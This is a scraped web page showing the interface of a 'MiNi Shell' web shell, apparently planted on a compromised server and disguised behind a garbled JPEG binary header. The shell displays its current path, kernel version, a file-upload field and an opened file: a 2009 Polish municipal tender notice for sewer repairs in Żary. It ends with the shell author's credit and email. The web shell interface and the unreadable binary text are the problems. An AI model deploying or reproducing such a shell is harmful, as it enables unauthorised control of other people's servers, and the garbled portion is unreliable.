JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090316/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090316/63854-N-2009.html

<p class="kh_header"><b>Żary: Remont kanalizacji sanitarnej i deszczowej w ul. Ogrodowej w Żarach</b><br>
<b>Numer ogłoszenia: 63854 - 2009; data zamieszczenia: 16.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski , Rynek 1-5/18, 68-200 Żary, woj. lubuskie, tel. (068) 363 43 13, faks (068) 374 38 83.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zary.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont kanalizacji sanitarnej i deszczowej w ul. Ogrodowej w Żarach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA
1. Przedmiot zamówienia zgodnie z projektem budowlanym stanowiącym rozdział VI  SIWZ obejmuje: 
1) w ulicy Podwale:
a) od miejsca włączenia do ist. kolektora deszczowego 1500x1000 mm do studni D704, 
- wymianę ist. kanału k. deszczowej z rur betonowych fi500 mm (demontaż) na rury Hobas fi400 mm, po istniejącej trasie na długości 117,35 m, (odległość mierzona w osiach studni),
b) na odcinku od studni D704 do D714, 
- budowę nowego odcinka k. deszczowej z rur PVC-U (lite) SN8 fi315 mm o długości 29,30 m
c) na odcinku od studni S402 do S415A, 
- wykonanie renowacji istniejącej k. sanitarnej wykonanej z rur kamionkowych fi200 rękawem poliestrowym nasączonym żywicami epoksydowymi, na długości całkowitej 144,95 m (odległości mierzone w osiach studni), kompleksowo z czyszczeniem kanału i kaperowaniem po założeniu rękawa oraz wycięciu rękawa w studniach,
d) na odcinku od studni SI do S402, 
- budowę nowego odcinka k. sanitarnej z rur PVC-U (lite) SN8 fi250 mm o długości 15,65 m z włączeniem do istniejącego kolektora fi600 mm (studnia SI)
2) w ulicy Ogrodowej:
a) od studni D704 do D706, 
- wymianę ist. kanału k. deszczowej z rur betonowych fi500 mm (demontaż) na rury Hobas fi400 mm, po istniejącej trasie na długości 22,2 m, (odległość mierzona w osiach studni),
b) od studni D706 do D713, 
- budowę nowego odcinka k. deszczowej z rur PVC-U (lite) SN8 fi315 mm o długości 65,55 m
c) od studni S404 do S406, 
- wykonanie renowacji istniejącej k. sanitarnej wykonanej z rur kamionkowych fi200 rękawem poliestrowym nasączonym żywicami epoksydowymi, na długości całkowitej 35,20 m (odległości mierzone w osiach studni), kompleksowo z czyszczeniem kanału i kaperowaniem po założeniu rękawa oraz wycięciu rękawa w studniach,
d) od studni S406 do S413, (dł. 42,5 m)
- wymianę ist. kanału k. sanitarnej z rur kamionkowych fi200 mm (demontaż) na rury PVC-U (lite) SN8 fi200 mm, po istniejącej trasie o długości 46,10 m (odległości mierzone w osiach studni)
3) szczegółowy zakres rzeczowy przedmiotu zamówienia określa:
a) przedmiar robót stanowiący rozdział V SIWZ
b) projekt budowlany stanowiący rozdział VI SIWZ
4) zakres rzeczowy przedmiotu zamówienia nie obejmuje robót rozbiórkowych istniejących nawierzchni ul. Ogrodowej i Podwale oraz chodników.
5) z uwagi na możliwe rozwiązania komunikacyjne inwestycja będzie musiała być realizowana dwuetapowo: 
- etap I ul. Podwale
- etap II ul. Ogrodowa.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8, 45.11.12.00-0, 45.45.30.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1). Wykonawca zapewni, jako część swojej oferty wadium w wysokości 15.000,00 zł. (słownie: piętnaście tysięcy złotych, 00/100). 
2) Wadium może być wniesione w:
a) pieniądzu,
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej z tym,
że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art., 6b ust. 5 pkt 2) ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42 poz. 275)
3) Zamawiający dokona zwrotu wniesionego wadium zgodnie z przepisami art. 46 ust. 1 - 4 ustawy Prawo zamówień publicznych. 
4) Wykonawca traci wadium na rzecz Zamawiającego w przypadkach określonych w art. 46 ust. 5 ustawy Prawo zamówień publicznych.
5) Zamawiający żąda ponownego wniesienia wadium przez Wykonawców, którym zwrócono wadium na podstawie art. 46 ust. 2 pkt. 2 i 3 zgodnie z przepisami art. 46 ust. 3 ustawy Prawo zamówień publicznych.
6) Wadium w formie pieniężnej należy wpłacić na konto Zamawiającego pod nazwą:

Urząd Miejski w Żarach
Bank Zachodni WBK S.A. Nr konta: 64 1090 2561 0000 0006 4200 0090,

Za termin wniesienia wadium w formie pieniężnej przyjmuje się termin wpływu pieniędzy na konto Zamawiającego, z uwzględnieniem terminu składania ofert.

7) Dowód wniesienia wadium w formie pieniężnej lub oryginał dokumentu stanowiącego akceptowalną formę wadium należy złożyć w siedzibie Zamawiającego w pokoju nr 27 przed terminem przewidzianym do składania ofert.
8) Nie zabezpieczenie Oferty akceptowalną formą wadium spowoduje wykluczenie Wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1) O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
a) spełniają warunki określone w art. 22 ust. 1 pkt. 1-4 ustawy,
b) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
c) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; na potwierdzenie spełnienia tego warunku Wykonawca załączy oświadczenie wg Załącznika nr 2 do oferty, o którym mowa w pkt. 4 ppkt. 5) lit. a) rozdziału I SIWZ,
d) posiadają niezbędną wiedzę i doświadczenie w zakresie realizacji zamówień o zakresie odpowiadającym swoim rodzajem przedmiotowi zamówienia, tj. wykonali (rozpoczęli i zakończyli) w ciągu ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, zadania polegające na:
-  wykonaniu renowacji istniejącej sieci kanalizacyjnej w technologii z wykorzystaniem rękawa poliestrowego nasączonego żywicami epoksydowymi - ilość zadań 2 o długości min. 100 m każde,
- budowie sieci kanalizacji sanitarnej i deszczowej -  ilość zadań 2, o długościach min. 500 m każda sieć,
Zadania muszą być poparte dokumentami (np. referencje, protokoły odbioru robót). 
Z dokumentów powinna wynikać informacja o rodzaju, zakresie, okresie i miejscu wykonanych robót oraz, że roboty te zostały wykonane należycie.
e) dysponują wykwalifikowanym personelem z odpowiednimi uprawnieniami wynikającymi z prawa budowlanego do realizacji zamówienia, tj. osobami uprawnionymi do wykonywania samodzielnych funkcji technicznych w budownictwie, posiadającymi aktualny wpis na listę członków właściwej izby samorządu zawodowego o specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,
lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia.
Wykonawca zobowiązany jest do wskazania osoby pełniącej funkcje Kierownika Budowy posiadającego uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,
f) dysponują odpowiednim potencjałem technicznym do realizacji zadania tj.
- koparko - spycharka 0,15 m3				1 szt,
- koparka przedsiębrana poj. łyżki 0,025 - 0,60 m3		1 szt 
- koparka przedsiębrana poj. łyżki 1,2 m3			1 szt
- samochód dostawczy 0,9t					1 szt
- samochód skrzyniowy 5 t					1 szt
- samochód samowyładowczy 5t				1 szt 
- ubijak spalinowy 200 kg					2 szt
- zagęszczarka płytowa, spalinowa, dwukierunkowa 500 kg	1 szt
- pompa spalinowa o wydajności do 35m3/h			1 szt
- żuraw samochodowy 4t					1 szt
- beczkowóz ciągniony 4000 l				           1 szt
lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego do wykonania zamówienia.
g) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy.
h) przed przystąpieniem do przetargu wnieśli wadium w wysokości i miejscu określonych w pkt. 8 SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1)	Formularz oferty wg rozdziału II niniejszej SIWZ.
2)	Informacja ogólna o Wykonawcy wg załącznika nr 1 do oferty.
3)	Kosztorys ofertowy, sporządzony zgodnie z pkt. 6 niniejszego rozdziału.
4)	Tabela elementów rozliczeniowych, wg załącznika nr 6 do Oferty.
5)	Na potwierdzenie spełnienia warunków udziału Wykonawcy w postępowaniu oferta powinna zawierać następujące dokumenty i oświadczenia: 
a)	Oświadczenie Wykonawcy o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych wg załącznika nr 2 do oferty.
b)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
c)	Wykaz robót wykonanych w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie odpowiadającym swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich zakresu, daty i miejsca ich wykonania wg załącznika nr 3 do oferty. 
d)	Dokumenty (np. referencje, protokoły odbioru robót) potwierdzające informacje o zakresie, dacie i miejscu wykonania zadania oraz, że wykazane w załączniku nr 3 do oferty roboty zostały wykonane należycie.
e)	Wykaz niezbędnego do wykonania zamówienia potencjału technicznego jakim dysponuje Wykonawca, wg załącznika nr 4 do oferty.
f)	Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakres wykonywanych przez nich czynności wraz ze wskazaniem osoby przewidzianej do pełnienia funkcji Kierownika Budowy wg załącznika nr 5 do oferty.
g)	Dokumenty potwierdzające uprawnienia do wykonywania samodzielnych funkcji przez osoby, które będą kierować robotami budowlanymi będącymi przedmiotem zamówienia, poparte zaświadczeniem odpowiedniej Izby Inżynierów Budownictwa o przynależności i posiadanych uprawnieniach..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.zary.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Żarach
Rynek 1-5
68-200 Żary, pok. 27.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.04.2009 godzina 11:45, miejsce: Urząd Miejski w Żarach
Rynek 1-5
68-200 Żary, pok. 27.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com